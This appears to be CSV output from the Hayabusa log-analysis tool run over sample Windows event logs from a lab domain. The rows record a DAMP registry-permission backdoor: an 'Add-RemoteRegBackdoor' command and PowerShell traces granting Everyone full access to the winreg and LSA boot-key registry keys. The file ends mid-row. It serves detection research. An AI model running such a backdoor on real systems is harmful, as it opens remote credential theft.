+2021-12-09 18:50:55.958 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:55.958 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.005 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.052 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.052 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: hack1 | Computer: - | IP Addr: 10.23.42.38 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.052 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: hack1 | LID: 0x2a2f10a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.099 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:50:56.146 +00:00,FS03.offsec.lan,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Windows\System32\wbem\WmiPrvSE.exe | User: hack1 | LID: 0x2a2d532,rules/hayabusa/default/alerts/Security/4673_PrivilegedServiceCalled_UnknownProcessUsedHighPrivilege.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 18:51:16.683 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9e8 | User: FS03$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID4624,4670,4688,4674-Registry permission change via WMI (DAMP).evtx" +2021-12-09 19:54:03.261 +00:00,fs03vuln.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-RemoteRegBackdoor -ComputerName FS03 -Trustee 'S-1-1-0',rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.261 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : ] Using trustee username 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.370 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Win32_Service"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""name='RemoteRegistry'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.370 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03] Attaching to remote registry through StdRegProv""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.370 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-WmiObject): ""Get-WmiObject"" ParameterBinding(Get-WmiObject): name=""Namespace""; value=""root/default"" ParameterBinding(Get-WmiObject): name=""Class""; value=""Meta_Class"" ParameterBinding(Get-WmiObject): name=""Filter""; value=""__CLASS = 'StdRegProv'"" ParameterBinding(Get-WmiObject): name=""ComputerName""; value=""FS03""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.386 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.417 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.417 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.435 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.435 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.435 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.451 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.453 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\SecurePipeServers\winreg] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.453 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.453 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.453 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.468 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.468 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.468 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.468 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.486 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\JD] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.486 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.494 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.494 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.494 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.494 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.503 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.503 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.503 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Skew1] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.503 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.519 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.519 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.519 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.519 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.535 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.540 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Calling SetSecurityDescriptor on the key with the newly created Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.540 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\Data] Backdooring completed for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.540 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Backdooring started for key""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating ACE with Access Mask of 983103 (ALL_ACCESS) and AceFlags of 2 (CONTAINER_INHERIT_ACE)""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Creating the trustee WMI object with user 'Everyone'""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Management.ManagementClass"" ParameterBinding(New-Object): name=""ArgumentList""; value=""win32_Trustee""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.556 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Applying Trustee to new Ace""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1112-Modify registry/ID800-4103-4104-Registry permission change via WMI (DAMP) PowerShell on source.evtx +2021-12-09 19:54:03.571 +00:00,fs03vuln.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Verbose): ""Write-Verbose"" ParameterBinding(Write-Verbose): name=""Message""; value=""[FS03 : SYSTEM\CurrentControlSet\Control\Lsa\GBG] Calling SetSecurityDescriptor on 